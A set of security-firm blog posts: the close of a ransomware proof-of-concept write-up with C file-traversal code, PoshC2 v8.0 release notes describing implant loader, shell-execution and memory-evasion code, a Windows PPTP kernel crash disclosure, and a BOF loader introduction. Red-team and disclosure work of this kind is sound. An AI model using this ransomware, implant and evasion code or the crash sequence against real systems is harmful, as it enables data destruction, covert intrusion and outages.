To follow that up, we enter a do-while loop, which continues while we have more directories or files to encrypt in our current directory. We initialize two more file directory path variables. The tmp2 variable stores the name of the next file/directory we need to traverse/encrypt, and the tmp3 variable stores the randomized encrypted file name after the file has been encrypted. Next, we check if the object we obtained a handle to is a directory and if it is the current or previous directory, ‘.’, or ‘..’. If it is, we skip them.

If it’s any other directory, we append the name of that directory to the current directory, add it as a node to our linked list, and continue. If it’s a file, we generate a random string, append that string to the current directory path, and call encryptFile(). This function takes the following parameters: the full path to the unencrypted file, the full path name of the encrypted file, and the password used to encrypt. We then call DeleteFile() on the unencrypted file. Finally, we obtain a handle to the next file in the folder.

To finish the function off, we recursively call encryptDirectory() until there are no more folders in the linked list of folders we identified.
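
A reduced sketch of that traversal is shown below. It recurses directly instead of using the linked list of directories described above, and encryptFile() is a hypothetical stand-in for the BreadBear encryption routine rather than real project code.

#include <windows.h>
#include <wchar.h>

// Hypothetical stand-in for the file encryption routine.
extern void encryptFile(const wchar_t *path);

// Recursively walk dir, skipping "." and "..", and hand every file found to
// encryptFile(). The traversal logic mirrors the description above.
void walkDirectory(const wchar_t *dir)
{
    wchar_t pattern[MAX_PATH];
    swprintf(pattern, MAX_PATH, L"%ls\\*", dir);

    WIN32_FIND_DATAW fd;
    HANDLE hFind = FindFirstFileW(pattern, &fd);
    if (hFind == INVALID_HANDLE_VALUE)
        return;

    do {
        if (wcscmp(fd.cFileName, L".") == 0 || wcscmp(fd.cFileName, L"..") == 0)
            continue;

        wchar_t path[MAX_PATH];
        swprintf(path, MAX_PATH, L"%ls\\%ls", dir, fd.cFileName);

        if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            walkDirectory(path);   // descend into sub-directories
        else
            encryptFile(path);     // process regular files
    } while (FindNextFileW(hFind, &fd));

    FindClose(hFind);
}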

I won’t dive too deep into the file encryption function for two reasons. First, I am not a big cryptography guy. I don’t know much about it, and I don’t want to give any false information. Second, I took this proof of concept and just implemented it in C instead of CPP.

However, the important part I'd like to highlight is that I used the same determination scheme as the Bleeding Bear campaign to ascertain whether a file should be corrupted or not. BreadBear and Bleeding Bear both use the file extension list reproduced in the stage 2 section above to determine if a file should be altered.

Conclusion

With BreadBear, I took an analysis of a real threat actor's TTPs and created a working proof of concept, which I believe improves upon some of their tooling. This work can help organizations visualize how easily such a campaign can be created, and defend accordingly. More importantly, it was an educational exercise. Feel free to contribute to the code base over on GitHub.

The post Repurposing Real TTPs for use on Red Team Engagements appeared first on Nettitude Labs.

Introducing PoshC2 v8.0

We’re thrilled to announce a new release of PoshC2 packed full of new features, modules, major improvements, and bug fixes. This includes the introduction of a brand-new native Linux implant and the capability to execute Beacon Object Files (BOF) directly from PoshC2!

Download and Documentation

Please use the following links for download and documentation:

RunOF Capability

In this release, we have introduced Joel Snape’s (@jdsnape) excellent method to run Cobalt Strike Beacon Object Files (BOF) in .NET, and its integration in PoshC2. This feature has a blog post unto itself available, but essentially it allows existing BOFs to be run in any C# implant, including PoshC2.

At a high-level, here is how it works:

  • Receive or open a BOF file to run
  • Load it into memory
  • Resolve any relocations that are present
  • Set memory permissions correctly
  • Locate the entry point for the BOF
  • Execute in a new thread
  • Retrieve any data output by the BOF
  • Clean-up memory artifacts before exiting

Read our recent blog post on this for more detail.

SharpSocks Improvements

SharpSocks provides HTTP-tunnelled SOCKS proxying capability to PoshC2. It has been rewritten and modernised to improve stability and usability, and its integration with PoshC2 has also been improved so that it can be configured and used more clearly and easily.

RunPE Integration

Last year, Rob Bone (@m0rv4i) and Ben Turner (@benpturner) released a whitepaper on “Process Hiving” along with a new tool “RunPE”, the source code of which can be found here. We have integrated this technique within this release of PoshC2 for ease of use, and it can be executed as follows:

runpe command usage within PoshC2

By default, new executables can be added to /opt/PoshC2/resources/modules/PEs so that PoshC2 knows where to find them when using the runpe and runpe-debug commands shown above.

DllSearcher

We’ve added the dllsearcher command which allows operators to search for specific module names loaded within the implant’s current process, for instance:

dllsearcher output listing matching modules loaded in the implant process

GetDllBaseAddress, FreeMemory & RemoveDllBaseAddress

Three evasion related commands were added which can be used to hide the presence of malicious shellcode in memory. getdllbaseaddress is used to retrieve the implant shellcode’s current base address, for example:

getdllbaseaddress output showing the implant shellcode's base address

Looking at our process in Process Hacker, we can correlate this base address memory location:

Process Hacker view of the corresponding memory region

By using the freememory command, we can then clear this address’ memory space:

freememory output, with Process Hacker confirming the region has been cleared

The removedllbaseaddress command is a combination of getdllbaseaddress and freememory, which can be used to expedite the above process by automatically finding and freeing the relevant implant shellcode’s memory space:

removedllbaseaddress output

Get-APICall & DisableEnvironmentExit

In this commit we implemented a means for operators to retrieve the memory location of specific function calls via get-apicall, for instance:

get-apicall output showing the resolved function address

In addition, we’ve included disableenvironmentexit which patches and prevents calls to Environment.Exit() within the current implant. This can be particularly useful when executing modules containing this call which may inadvertently kill our implant’s process.

C# Ping, IPConfig, and NSLookup Modules

Several new C# modules related to network operations were developed and added to this release, thanks to Leo Stavliotis (@lstavliotis). They can be run using the following new commands:

  • ping <ip/hostname>
  • nslookup <ip/hostname>
  • ipconfig

C# Telnet Client

A simple Telnet client module has been developed by Charley Celice (@kibercthulhu) and embedded in the C# implant handler to provide operators the ability to quickly validate Telnet access where needed. It will simply attempt to connect and run an optional command before exiting:

SharpTelnet connecting to a host and running a command

We have plans to add additional modules such as this one to cover a wider range of services.

C# Registry Module

Another module by Charley Celice (@kibercthulhu) was added. SharpReg allows for common registry operations in Windows. At this stage it currently consists of simple functionalities to search, query, create/edit, delete and audit registry hives, keys, values and data. It can be executed as shown below:

SharpReg command usage

We're adding more features to this module, which will include expediting certain registry-based persistence, privilege escalation and UAC bypass techniques, and more.

PoshGrep

PoshGrep can easily be used to parse task outputs. This can be particularly useful when searching for specific process information obtained from a large number of remote hosts. It can be used by piping your PoshC2 command into poshgrep, for example:

Command output piped through poshgrep

The output task database retains the full output for tracking.

FindFile

findfile was added, which can be used to search for specific file names and types. In the example below, we search for any occurrences of the file name “password” within .txt files:

findfile output listing matching files

Bringing PoshC2 to Linux

One of the major new features we have incorporated in this release of PoshC2 is our new Native Linux implant, thanks to the great work of Joel Snape (@jdsnape). While it’s fair to say that we spend most of our time on Windows, we find that having the capability to persist on Linux machines (usually servers) can be key to a successful engagement. We also know that many of the adversaries we simulate have developed tooling specifically for Linux. PoshC2 has always had a Python implant which will run on Linux assuming that Python is installed, but we decided that it was time that we advanced our capabilities to a native binary that is harder to detect and has fewer dependencies.

To that end, Posh v8.0 includes a native Linux implant that can run on any* x86/x64 Linux OS with a kernel >= 2.6 (it should work on earlier versions, but we’ve not tested that far back!). It also works on a few systems that aren’t Linux but have implemented enough of the syscall interface (most importantly ESXi hypervisors).

Usage

When payloads are created in PoshC2 you will notice a new “native_linux” payload being written on startup:

Payload creation output showing the new native_linux payload

This is the stage one payload, and when executed it will contact the C2 server and retrieve the second stage. The first stage is a statically linked stripped executable, around 1MB in size. The second stage is a statically linked shared library that the first stage will load into memory using a custom ELF loader and execute (see below for more detail). The dropper has been designed to be as compatible as possible, and so should just work out of the box regardless of what userspace is present.

The aim of the implant is not to be “super-stealthy”, but to emulate a common Linux userspace Trojan. Therefore, the implant just needs to be executed directly; how you do this will obviously depend on the level of access you have to your target.

Once the second stage has been downloaded and executed the implant operates in much the same way as the existing Python implant, supporting many of the same commands, and they can be listed with the help command:

Implant help output listing the supported commands

Most notably, the implant allows you to execute other commands as child processes using /bin/sh, run Python modules (again, assuming a Python interpreter is present on your target), and run the linuxprivchecker script that is present in the Python implant.

Goal

To meet our needs, we set the following high-level goals:

  • Follow the existing pattern of a small stage one loader, with a second stage being downloaded from the C2 server.
  • A native executable, with as few dependencies as possible and that would run on as many different distributions as possible.
  • Compatibility with older distributions, particularly those with an older kernel.
  • As little written to disk as possible beyond the initial loader.
  • Run in user-space (i.e., not a kernel implant).

This gives us greater flexibility and stealth, and allows us to operate on machines that may not have Python installed or where a running Python process would be anomalous.

There are a few choices in language and architecture to build native executables. The “traditional” method is to use C or C++ which compiles to an ELF executable. More modern languages, like Golang, are also an option, and have notably been used by some threat groups to develop native tooling. For this project however we decided to stick with C as it lets us implement small and lean executables.

How it Works

The Linux implant comes in two parts, a dropper and a stage two which is downloaded from the C2.

Compilation of the native images can be a bit time consuming, so we have provided binary images in the PoshC2 distribution (you can see the source code here). This means that when a new implant is generated, PoshC2 needs a way to "inject" its configuration into the binary file. All configuration is contained in the dropper, in an additional ELF section at the end of the binary, except for a random key and URI which are patched over placeholder values in the stage two binary. This configuration is injected by PoshC2 using objcopy when a new implant is generated. You should note that at the moment there is no obfuscation or encryption of the configuration, so it will be trivially readable with strings or similar.

When the dropper is launched it parses the configuration and connects to the C2 server to obtain the second stage using the configured hosts and URLs.

Loading the Second Stage

Our main aim with the execution of the second stage was to be able to run it without writing any artifacts to disk, and to have something that was easy to develop and compile. Given the above goals, it also needed to be as portable as possible.

The easiest way to do this would be to create a shared library and use the dlopen() and dlsym() functions to load it and find the address of a function to call. Historically, the dlopen() functions required a file to operate on, but as of kernel version 3.17 it is possible to use memfd_create to get a file descriptor for memory without requiring a writable mount point. However, there are two issues with that approach:

  • The musl standard library we are using (see below) doesn’t support dlopen as it doesn’t make sense in a context where everything is statically linked.
  • Ideally, we’d like to support kernels older than 3.17, as although it was released in 2014, we still come across older ones from time to time.

Given these constraints, we implemented our own shared library loader in the dropper. More details can be found in the project readme, but at a high level it’s this:

  • Parses the stage two ELF header, and allocates memory as appropriate.
  • Copies segments into memory as required.
  • Carries out any relocations required (as specified in the relocations section).
  • Finds the address of our library’s entry function (we define this as loopy() because it, well, loops…).
  • Calls the library function with a pointer to a configuration object and a table of function pointers to common functions the second stage needs.
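
As a very reduced illustration of the first two steps, mapping the PT_LOAD segments of the stage two library might look something like the sketch below. Relocations, symbol lookup and error handling are omitted, and this is not the implant's actual loader code.

#define _DEFAULT_SOURCE
#include <elf.h>
#include <string.h>
#include <sys/mman.h>

// Map the PT_LOAD segments of an in-memory ELF image into one RWX region.
void *map_segments(const unsigned char *image)
{
    const Elf64_Ehdr *ehdr = (const Elf64_Ehdr *)image;
    const Elf64_Phdr *phdr = (const Elf64_Phdr *)(image + ehdr->e_phoff);
    size_t span = 0;

    // Work out how much contiguous memory the loadable segments need.
    for (int i = 0; i < ehdr->e_phnum; i++)
        if (phdr[i].p_type == PT_LOAD && phdr[i].p_vaddr + phdr[i].p_memsz > span)
            span = phdr[i].p_vaddr + phdr[i].p_memsz;

    unsigned char *base = mmap(NULL, span, PROT_READ | PROT_WRITE | PROT_EXEC,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;

    // Copy each PT_LOAD segment to its virtual address within the region.
    for (int i = 0; i < ehdr->e_phnum; i++)
        if (phdr[i].p_type == PT_LOAD)
            memcpy(base + phdr[i].p_vaddr, image + phdr[i].p_offset, phdr[i].p_filesz);

    return base;  // next: apply relocations, then resolve and call the entry function
}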

If you want to understand this process in more detail there is an excellent set of articles by Eli Bendersky that go through the process for load time relocation and position independent code.

In theory, the second stage could be any statically linked library, but we’ve not extensively tested the loader. In the future, we’d like to re-use this loader capability to allow additional modules to be delivered to the implant so you can bring your own tooling as needed (for example, network scanning or proxying).

At this point the second stage is now operating and can communicate with the C2, run commands, etc.

Compatibility

One of the key aims for the Linux implant was to make it operate on as many different distributions/versions as possible without needing to have any prior knowledge of what was running before deployment – something that can be difficult to achieve with a single binary.

Normally Linux binaries are “dynamically linked”, which means that when the program is run the OS runtime-linker (usually something like /lib/ld-linux-x86-64.so.2) finds and loads the shared libraries that are needed.

For example, running ldd /bin/ssh, which shows the linked library dependencies, demonstrates that it depends on a range of different system libraries to do things like cryptographic operations, DNS resolution and thread management. This is convenient because your binaries end up being smaller as code is reused; however, it also means that your program will not run unless the specific version of each library you linked against at compile time is present on the target system.

Obviously, we can’t always guarantee what will be present on the systems we are deploying on, so to work around this the implant is “statically linked”. This means that the executable contains its code and all of the libraries that it needs to operate in one file and has no dependencies on anything other than the operating system kernel.

The key component that needs to be linked is the "standard library", which is the set of functions used to carry out common tasks like string and memory manipulation and, most importantly, to interface between your application and the OS kernel using the system call API. The most common standard library is the GNU C library (glibc), and this is what you will usually find on most Linux distributions. However, it is fairly large and can be difficult to statically link successfully. For this reason, we decided to use the musl library, which is designed to be simple and efficient, and is commonly used to produce statically linked executables (as on Alpine Linux, for example).

Because the implant comes in two parts, if there are any common dependencies (e.g., we use libcurl to make HTTPS requests) then they would normally have to be statically linked into each binary. This would obviously be inefficient as the process would end up having two copies of the library in memory, one from the dropper and one from the stage two, and the stage two would be unnecessarily large. Therefore, for the larger libraries like libcurl a set of function pointers are provided from the dropper when it executes the stage two, so it can take advantage of the libraries that were already linked into the dropper.
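
Conceptually, the hand-off looks something like the sketch below. The structure and member names are purely illustrative and do not reflect the implant's real definitions.

// Illustrative only: the real structure layouts in the implant differ.
typedef struct {
    void *(*curl_easy_init)(void);
    int   (*curl_easy_setopt)(void *handle, int option, ...);
    int   (*curl_easy_perform)(void *handle);
    void  (*curl_easy_cleanup)(void *handle);
} api_table_t;

typedef struct {
    const char *c2_host;           // where to fetch tasks from
    const char *uri;               // patched-in URI
    const unsigned char *key;      // patched-in random key
} implant_config_t;

// Entry point exported by the stage two library ("loopy" in the write-up above).
typedef void (*stage2_entry_t)(const implant_config_t *cfg, const api_table_t *api);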

The implant is built for x86 systems, as this means that it will run on both 32- and 64-bit operating systems. Other architectures (e.g., ARM) may follow.

Child Processes

Our implant would be pretty limited without the ability to execute other commands using the system shell. This is easily carried out using the popen() function call in the standard library which executes the given command and opens a pipe so the command’s output can be read. However, some commands (e.g. ping with default arguments) may not exit, and so our implant would “hang” reading the output forever. To get around this, we have written a custom popen() implementation that allows us to launch our subcommand in a custom process group and set an alarm using SIGALRM to kill it after a user-configurable timeout period. Any output written by the process is then read and returned to the C2. This does mean however that long running commands will be prematurely terminated.
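
A simplified sketch of such a timed popen() replacement is shown below; it is illustrative only and omits the error handling the real implant would need.

#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static pid_t child_pgid;

// SIGALRM handler: kill the whole process group running the command.
static void alarm_handler(int sig)
{
    (void)sig;
    kill(-child_pgid, SIGKILL);
}

// Run cmd under /bin/sh, capture its output, and kill it after timeout seconds.
ssize_t run_with_timeout(const char *cmd, unsigned int timeout, char *out, size_t out_len)
{
    int fds[2];
    pipe(fds);

    pid_t pid = fork();
    if (pid == 0) {                       /* child */
        setpgid(0, 0);                    /* own process group, so children die with it */
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]);
        close(fds[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }

    child_pgid = pid;
    signal(SIGALRM, alarm_handler);
    alarm(timeout);                       /* fire SIGALRM after the timeout */

    close(fds[1]);
    ssize_t total = 0, n;
    while ((n = read(fds[0], out + total, out_len - 1 - (size_t)total)) > 0)
        total += n;
    out[total] = '\0';

    alarm(0);
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return total;
}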

Detection

We typically find that Linux environments have a lot less scrutiny applied than their Windows counterparts. Nevertheless, they are often hosting critical services and data and so monitoring for suspicious or unusual behaviour should be considered. Many security vendors are starting to release monitoring agents for Linux, and several open-source tools are available.

A full exploration of security monitoring for Linux is out of scope for this post, but some things that might be seen when using this implant are:

  • Anomalous logins (for example SSH access at unusual times, or from an unusual location).
  • Vulnerability exploitation (for example, alerts in NIDS).
  • wget or curl being used to download files for execution.
  • Program execution from an unusual location (e.g. from a temporary directory or user’s home directory).
  • Changes to user or system cron entries.

The dropper itself has very limited operational security so we expect static detection of the binary by antivirus or NIDS to be relatively straightforward in this publicly released version.

It’s also worth reviewing the PoshC2 indicators of compromise listed at https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise.

Full Changelog

Many other updates and fixes have been added in this version and merged to dev, some of which are briefly summarized below. For updates and tips check out @nettitude_labs, @benpturner, @m0rv4i and @b4ggio-su on Twitter.

  • Miscellaneous fixes and refactoring
  • Fixed MSTHA and RegSvr32 quickstart payloads
  • Several runas and Daisy.dll related fixes
  • Improved PoshC2 reports output and style
  • Enforced the consistent use of UTC throughout
  • FComm related fixes
  • Added Native Linux implant and related functionalities from Joel Snape (@jdsnape)
  • Added Get-APICall & DisableEnvironmentExit in Core
  • Updated to psycopg2-binary so it’s not compiled from source
  • Database related fixes
  • RunPE integration
  • Added GetDllBaseAddress, FreeMemory, and RemoveDllBaseAddress in Core
  • Added C# Ping module from Leo Stavliotis (@lstavliotis)
  • Fixed fpc script on PostgreSQL
  • Added PrivescCheck.ps1 module
  • Added C# IPConfig module from Leo Stavliotis (@lstavliotis)
  • Updated several external modules, including Seatbelt, StandIn, Mimikatz
  • Added EventLogSearcher & Ldap-Searcher
  • Added C# NSLookup module from Leo Stavliotis (@lstavliotis)
  • Added getprocess in Core
  • Added findfile, getinstallerinfo, regread, lsreg, and curl in Core
  • Added GetGPPPassword & GetGPPGroups modules
  • Added Get-IdleTime to Core
  • Added PoshGrep option for commands
  • Added SharpChromium
  • Added DllSearcher to Core
  • Updated Dynamic-Code for PBind
  • Added RunOF capability into Posh along with several compiled situational awareness OFs
  • Updated Daisy Comms
  • Added C# SQLQuery module from Leo Stavliotis (@lstavliotis)
  • Added ATPMiniDump
  • Added rmdir, mkdir, zip, unzip & ntdsutil to Core
  • Fix failover retries for C# & Updated SharpDPAPI
  • Updated domain check case sensitivity in dropper
  • Fixed dropper rotation break
  • Added WMIExec and SMBExec modules
  • Added dcsync alias for Mimikatz
  • Added AES256 hash for uploaded files
  • Added RegSave module
  • SharpShadowCopy integration
  • Fixed and updated cookie decrypter script
  • Updated OPSEC Upload
  • Added FileGrep module
  • Added NetShareEnum to Core
  • Added StickyNotesExtract
  • Added SharpShares module
  • Added SharpPrintNightmare module
  • Added in memory SharpHound option
  • Updated Tasks.py to save Seatbelt output
  • Added kill-remote-process to Core
  • Fixed jxa_handler not being imported
  • Updated posh-update script to accept -x to skip install
  • Added process name in implant view from Lefteris Panos (@Lefterispan)
  • Added SharpReg module from Charley Celice (@kibercthulhu)
  • Added SharpTelnet module from Charley Celice (@kibercthulhu)
  • kill-process with no arguments now terminates the implant’s current process following a warning prompt
  • Added hide-dead-implants command
  • Added ability to modify user agent when creating new payloads from Kirk Hayes (@l0gan54k)
  • Added get-acl command in Core

Download now

GitHub: https://github.com/nettitude/PoshC2

The post Introducing PoshC2 v8.0 appeared first on Nettitude Labs.

CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference

22 March 2022 at 09:00

CVE-2022-23253 is a Windows VPN (remote access service) denial of service vulnerability that Nettitude discovered while fuzzing the Windows Server Point-to-Point Tunnelling Protocol (PPTP) driver. The implications of this vulnerability are that it could be used to launch a persistent Denial of Service attack against a target server. The vulnerability requires no authentication to exploit and affects all default configurations of Windows Server VPN.

Nettitude has followed a coordinated disclosure process and reported the vulnerability to Microsoft. As a result the latest versions of MS Windows are now patched and no longer vulnerable to the issue.

Affected Versions of Microsoft Windows Server

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected windows versions check the official disclosure post on MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23253.

Overview

PPTP is a VPN protocol used to multiplex and forward virtual network data between a client and a VPN server. The protocol has two parts, a TCP control connection and a GRE data connection. The TCP control connection is mainly responsible for configuring the buffering and multiplexing of network data between the client and server. In order to talk to the control connection of a PPTP server, we only need to connect to the listening socket and initiate the protocol handshake. After that we are able to start a complete PPTP session with the server.

When fuzzing for vulnerabilities the first step is usually a case of waiting patiently for a crash to occur. In the case of fuzzing the PPTP implementation we had to wait a mere three minutes before our first reproducible crash!

Our first step was to analyse the crashing test case and minimise it to create a reliable proof of concept. However before we dissect the test case we need to understand what a few key parts of the control connection logic are trying to do!

The PPTP Handshake

PPTP implements a very simple control connection handshake procedure. All that is required is that a client first sends a StartControlConnectionRequest to the server and then receives a StartControlConnectionReply indicating that there were no issues and the control connection is ready to start processing commands. The actual contents of the StartControlConnectionRequest has no effect on the test case and just needs to be validly formed in order for the server to progress the connection state into being able to process the rest of the defined control connection frames. If you’re interested in what all these control packet frames are supposed to do or contain you can find details in the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637).

PPTP IncomingCall Setup Procedure

In order to forward network data to a PPTP VPN server, the control connection needs to establish a virtual call with the server. There are two types of virtual call when communicating with a PPTP server: outgoing calls and incoming calls. To communicate with a VPN server from a client we typically use the incoming call variety. Finally, to set up an incoming call from a client to a server, three control message types are used.

  • IncomingCallRequest – Used by the client to request a new incoming virtual call.
  • IncomingCallReply – Used by the server to indicate whether the virtual call is being accepted. It also sets up call IDs for tracking the call (these IDs are then used for multiplexing network data as well).
  • IncomingCallConnected – Used by the client to confirm connection of the virtual call and causes the server to fully initialise it ready for network data.

The most important bit of information exchanged during call setup is the call ID. This is the ID used by the client and server to send and receive data along that particular call. Once a call is set up data can then be sent to the GRE part of the PPTP connection using the call ID to identify the virtual call connection it belongs to.

The Test Case

After reducing the test case, we can see that at a high level the control message exchanges that cause the server to crash are as follows:

StartControlConnectionRequest() Client -> Server
StartControlConnectionReply() Server -> Client
IncomingCallRequest() Client -> Server
IncomingCallReply() Server -> Client
IncomingCallConnected() Client -> Server
IncomingCallConnected() Client -> Server

The test case appears to initially be very simple and actually mostly resembles what we would expect for a valid PPTP connection. The difference is the second IncomingCallConnected message. For some reason, upon receiving an IncomingCallConnected control message for a call ID that is already connected, a null pointer dereference is triggered causing a system crash to occur.

Let’s look at the crash and see if we can see why this relatively simple error causes such a large issue.

The Crash

Looking at the stack trace for the crash we get the following:

... <- (Windows Bug check handling)
NDIS!NdisMCmActivateVc+0x2d
raspptp!CallEventCallInConnect+0x71
raspptp!CtlpEngine+0xe63
raspptp!CtlReceiveCallback+0x4b
... <- (TCP/IP Handling)

What's interesting here is that the crash does not take place in the raspptp.sys driver at all, but instead occurs in the ndis.sys driver. What is ndis.sys? Well, raspptp.sys is what is referred to as a mini-port driver, which means that it only implements a small part of the functionality required for an entire VPN interface; the rest of the VPN handling is performed by the NDIS driver system. raspptp.sys acts as a front end parser for PPTP which then forwards the encapsulated virtual network frames on to NDIS to be routed and handled by the rest of the Windows VPN back-end.

So why is this null pointer dereference happening? Let’s look at the code to see if we can glean any more detail.

The Code

The first section of code is in the PPTP control connection state machine. The first part of this handling is a small stub in a switch statement for handling the different control messages. For an IncomingCallConnected message, we can see that all the code initially does is check that a valid call ID and context structure exists on the server. If they do exist, a call is made to the CallEventCallInConnect function with the message payload and the call context structure.

case IncomingCallConnected:
    // Ensure the client has sent a valid StartControlConnectionRequest message
    if ( lpPptpCtlCx->CtlCurrentState == CtlStateWaitStop )
    {
        // BigEndian To LittleEndian Conversion
        CallIdSentInReply = (unsigned __int16)__ROR2__(lpCtlPayloadBuffer->IncomingCallConnected.PeersCallId, 8);
        if ( PptpClientSide ) // If we are the client
            CallIdSentInReply &= 0x3FFFu; // Maximum ID mask
        // Get the context structure for this call ID if it exists
        IncomingCallCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, CallIdSentInReply);
        // Handle the incoming call connected event
        if ( IncomingCallCallCtx )
            CallEventCallInConnect(IncomingCallCallCtx, lpCtlPayloadBuffer);

The CallEventCallInConnect function performs two tasks; it activates the virtual call connection through a call to NdisMCmActivateVc and then if the returned status from that function is not STATUS_PENDING it calls the PptpCmActivateVcComplete function.

__int64 __fastcall CallEventCallInConnect(CtlCall *IncomingCallCallCtx, CtlMsgStructs *IncomingCallMsg)
{
    unsigned int ActiveateVcRetCode;
    ...
    ActiveateVcRetCode = NdisMCmActivateVc(lpCallCtx->NdisVcHandle, (PCO_CALL_PARAMETERS)lpCallCtx->CallParams);
    if ( ActiveateVcRetCode != STATUS_PENDING )
    {
        if...
            PptpCmActivateVcComplete(ActiveateVcRetCode, lpCallCtx, (PVOID)lpCallCtx->CallParams);
    }
    return 0i64;
}

...

NDIS_STATUS __stdcall NdisMCmActivateVc(NDIS_HANDLE NdisVcHandle, PCO_CALL_PARAMETERS CallParameters)
{
    __int64 v2; // rbx
    PCO_CALL_PARAMETERS lpCallParameters; // rdi
    KIRQL OldIRQL; // al
    _CO_MEDIA_PARAMETERS *lpMediaParameters; // rcx
    __int64 v6; // rcx

    v2 = *((_QWORD *)NdisVcHandle + 9);
    lpCallParameters = CallParameters;
    OldIRQL = KeAcquireSpinLockRaiseToDpc((PKSPIN_LOCK)(v2 + 8));
    *(_DWORD *)(v2 + 4) |= 1u;
    lpMediaParameters = lpCallParameters->MediaParameters;
    if ( lpMediaParameters->MediaSpecific.Length < 8 )
        v6 = (unsigned int)v2;
    else
        v6 = *(_QWORD *)lpMediaParameters->MediaSpecific.Parameters;
    *(_QWORD *)(v2 + 136) = v6;
    *(_QWORD *)(v2 + 136) = *(_QWORD *)lpCallParameters->MediaParameters->MediaSpecific.Parameters;
    KeReleaseSpinLock((PKSPIN_LOCK)(v2 + 8), OldIRQL);
    return 0;
}

We can see that in reality the NdisMCmActivateVc function is surprisingly simple. We know that it always returns 0, so there will always be a subsequent call to PptpCmActivateVcComplete from the CallEventCallInConnect function.

Looking at the stack trace we know that the crash is occurring at an offset of 0x2d into the NdisMCmActivateVc function which corresponds to the following line in our pseudo code:

lpMediaParameters = lpCallParameters->MediaParameters;

Since NdisMCmActivateVc doesn’t sit in our main target driver, raspptp.sys, it’s mostly un-reverse engineered, but it’s pretty clear to see that the main purpose is to set some properties on a structure which is tracked as the handle to NDIS from raspptp.sys. Since this doesn’t really seem like it’s directly causing the issue we can safely ignore it for now. The particular variable lpCallParameters (also the CallParameters argument) is causing the null pointer dereference and is passed into the function by raspptp.sys; this indicates that the vulnerability must be occurring somewhere else in the raspptp.sys driver code.

Referring back to the call from CallEventCallInConnect, we know that the CallParameters argument is actually a pointer stored within the Call Context structure in raspptp.sys. We can assume that at some point in the call to PptpCmActivateVcComplete this structure is freed and the pointer member of the structure is set to zero. So let's find the responsible line!

void __fastcall PptpCmActivateVcComplete(unsigned int OutGoingCallReplyStatusCode, CtlCall *CallContext, PVOID CallParams)
{
    CtlCall *lpCallContext; // rdi
    ...
if ( lpCallContext->UnkownFlag )
{
    if ( lpCallParams )
        ExFreePoolWithTag((PVOID)lpCallContext->CallParams, 0);
        lpCallContext->CallParams = 0i64;
        ...

After a little bit of looking we can see the responsible section of code. From reverse engineering the setup of the CallContext structure, we know that the UnkownFlag structure variable is set to 1 by the handling of the IncomingCallRequest frame, where the CallContext structure is initially allocated and set up. For our test case this code will always execute, and thus the second call to CallEventCallInConnect will trigger a null pointer dereference and crash the machine in the NDIS layer, causing the appropriate Blue Screen of Death to appear.

Proof Of Concept

We will release proof of concept code on May 2nd to allow extra time for systems administrators to patch.

Timeline

  • Vulnerability reported To Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 18 Jan 2022
  • Patch released – 08 March 2022
  • Blog released – 22 March 2022

The post CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference appeared first on Nettitude Labs.

Introducing RunOF – Arbitrary BOF tool

2 March 2022 at 20:26

A few years ago, a new feature was added to Cobalt Strike called “Beacon Object Files” (BOFs). These provide a way to extend a beacon agent post-exploitation with new features, perhaps to respond to conditions that you find after exploring an environment. Since then, the community has created many BOFs to cover many common scenarios, and we’ve been leveraging some of them to more closely emulate adversary actions on objectives.

GitHub: https://github.com/nettitude/RunOF

While doing this we’ve wanted to have a way to help us more easily debug and test our own BOFs, as well as use them across all the tooling we use. Therefore, we’re introducing RunOF – a tool that allows you to run BOFs outside of the Cobalt agent, as well as within PoshC2.

What is RunOF?

The aim of this project is to create a .NET application that is able to load arbitrary BOFs, pass arguments to them, execute them and collect and return any output. Additionally, the .NET application should be able to run within C2 frameworks, such as PoshC2.

The overall process is broadly similar to that used by the RunPE tool that we recently released, and so the RunOF tool uses some of the same techniques. The high-level process is as follows:

  • Receive or open a BOF file to run
  • Load it into memory
  • Resolve any relocations that are present
  • Set memory permissions correctly
  • Locate the entry point for the BOF
  • Execute in a new thread
  • Retrieve any data output by the BOF
  • Cleanup memory artifacts before exiting

How RunOF works

The first step in developing RunOF was to understand in detail what Beacon Object Files are. To do this, we looked at the publicly available documentation, and some of the example BOFs produced by the community.

A BOF contains an exported routine (typically a function called ‘go’ – but it can be anything you like), as well as calls to routines such as BeaconPrintf to return data back to the agent. There is also a convention that allows access to the Windows API by calling a function of the form DLL_name$function_name – e.g. kernel32$VirtualAlloc.
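To make this concrete, below is a minimal sketch of what a BOF source file typically looks like. The BeaconPrintf declaration and the CALLBACK_OUTPUT constant normally come from the beacon.h header, and the build command shown is just one common way of producing an object file; none of this is taken from a specific RunOF example.

/* bof_example.c - a minimal, illustrative BOF.
   Build as an object file only, e.g.: x86_64-w64-mingw32-gcc -c bof_example.c -o bof_example.o */
#include <windows.h>

/* Normally provided by beacon.h; the loader resolves these symbols at run time */
#define CALLBACK_OUTPUT 0x0
DECLSPEC_IMPORT void BeaconPrintf(int type, char *fmt, ...);

/* The DLL_name$function_name convention: resolved by the loader to kernel32!VirtualAlloc */
DECLSPEC_IMPORT LPVOID WINAPI kernel32$VirtualAlloc(LPVOID, SIZE_T, DWORD, DWORD);

/* 'go' is the conventional entry point invoked by the loader */
void go(char *args, int len)
{
    LPVOID buf = kernel32$VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    BeaconPrintf(CALLBACK_OUTPUT, "Allocated a scratch buffer at %p", buf);
}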

